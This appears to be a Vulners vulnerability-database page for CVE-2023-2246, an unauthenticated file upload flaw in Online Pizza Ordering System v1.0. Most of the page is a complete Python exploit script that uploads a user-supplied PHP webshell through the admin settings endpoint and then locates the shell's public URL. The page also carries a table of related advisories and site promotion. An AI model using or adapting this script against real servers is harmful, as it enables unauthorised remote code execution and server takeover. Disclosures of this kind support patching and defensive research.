Vulners
Lucene search
Online Pizza Ordering System v1.0 - Unauthenticated File Upload
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Online Pizza Ordering System v1.0 - Unauthenticated File Upload Exploit | 5 May 202300:00 | – | zdt |
 | CVE-2023-37151 | 10 Jul 202316:15 | – | attackerkb |
 | CVE-2023-2246 | 23 Apr 202320:38 | – | circl |
 | Online Pizza Ordering System 代码问题漏洞 | 23 Apr 202300:00 | – | cnnvd |
 | Online Pizza Ordering System Arbitrary File Upload Vulnerability (CNVD-2023-32180) | 25 Apr 202300:00 | – | cnvd |
 | CVE-2023-2246 | 23 Apr 202315:31 | – | cve |
 | CVE-2023-2246 SourceCodester Online Pizza Ordering System unrestricted upload | 23 Apr 202315:31 | – | cvelist |
 | EUVD-2023-33754 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-2246 | 23 Apr 202316:15 | – | nvd |
 | CVE-2023-2246 | 23 Apr 202316:15 | – | osv |
10
# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
# Date: 03/05/2023
# Exploit Author: URGAN
# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
# Version: v1.0
# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
# CVE: CVE-2023-2246
#!/usr/bin/env python3
# coding: utf-8
import os
import requests
import argparse
from bs4 import BeautifulSoup
# command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', type=str, help='URL with http://')
parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
args = parser.parse_args()
# if no arguments are passed, ask the user for them
if not (args.url and args.payload):
args.url = input('Enter URL with http://: ')
args.payload = input('Enter file path PHP webshell: ')
# URL Variables
url = args.url + '/admin/ajax.php?action=save_settings'
img_url = args.url + '/assets/img/'
filename = os.path.basename(args.payload)
files = [
('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
]
# send a POST request to the server
resp_upl = requests.post(url, files = files)
status_code = resp_upl.status_code
if status_code == 200:
print('[+] File uploaded')
else:
print(f'[-] Error {status_code}: {resp_upl.text}')
raise SystemExit(f'[-] Script stopped due to error {status_code}.')
# send a GET request to the server
resp_find = requests.get(img_url)
# Use BeautifulSoup to parse the page's HTML code
soup = BeautifulSoup(resp_find.text, 'html.parser')
# get all <a> tags on a page
links = soup.find_all('a')
# list to store found files
found_files = []
# we go through all the links and look for the desired file by its name
for link in links:
file_upl = link.get('href')
if file_upl.endswith(filename): # uploaded file name
print('[+] Uploaded file found:', file_upl)
file_url = img_url + file_upl # get the full URL of your file
found_files.append(file_url) # add the file to the list of found files
# if the list is not empty, then display all found files
if found_files:
print('[+] Full URL of your file:')
for file_url in found_files:
print('[+] ' + file_url)
else:
print('[-] File not found')Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 May 2023 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 3.16.3 - 9.8
CVSS 26.5
CVSS 36.3
EPSS0.03624
SSVC